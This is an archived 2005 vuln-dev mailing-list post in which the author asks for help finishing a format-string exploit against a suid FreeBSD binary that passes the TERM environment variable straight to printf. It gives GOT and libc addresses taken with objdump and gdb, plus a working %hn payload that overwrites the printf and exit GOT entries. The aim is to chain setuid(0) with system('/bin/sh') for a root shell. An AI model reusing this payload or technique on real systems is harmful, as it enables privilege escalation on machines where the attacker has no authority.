[prev in list] [next in list] [prev in thread] [next in thread] 

List:       vuln-dev
Subject:    Format Strings nonexec heap/stack
From:       Alex <alex00882007 () gmail ! com>
Date:       2005-01-30 6:04:43
Message-ID: c912c14050129220445572e37 () mail ! gmail ! com
[Download RAW message or body]

Hello, this is my first post. I hope its in the list.

I am posting to get some help in developing an exploit for such a condition.

The environment:
Freebsd machine, nonexec heap/stack.  This is a suid binary, but is
not calling setuid().

main()
{
        char * ptr ;
        ptr = getenv("TERM");
        if(ptr)
            printf(ptr);
        printf("\n");
        exit(0);
}

objdump -R | grep printf
0804999c R_386_JUMP_SLOT   printf
objdump -R | grep exit
080499b0 R_386_JUMP_SLOT   exit

(gdb) p setuid
$1 = {<text variable, no debug info>} 0x280c1370 <setuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x28093a38 <system>



Using a format string it is possible to over-write the GOT entries for
printf() and exit().
I have been able to do so successfully. The problem is that it is not
enough to do just  that, since it will become system("\n") or
system(0);

On freebsd, arguments are passed via pushing to the stack. 
What I have been trying to do is this.

After rewriting the GOT entry for printf as that of setuid(), i want
to push a NULL byte onto the stack to call setuid(0);
The GOT entry for exit() has been replaced by that of system(). So
instead of pushing 0x0, i want to push a pointer to a "/bin/sh"
string.

Is this possible even? Or is there a better way of doing this.

to ovewrrite GOT:
export TERM=` printf  \
"\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
%.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn


where OFFSET = stackpop(?). Usually this is ~130 but it depends on how
your environmental variables are setup.

Im not sure what I would do next in order to change the values that
are being pushed. Could someone help me with this?
[prev in list] [next in list] [prev in thread] [next in thread]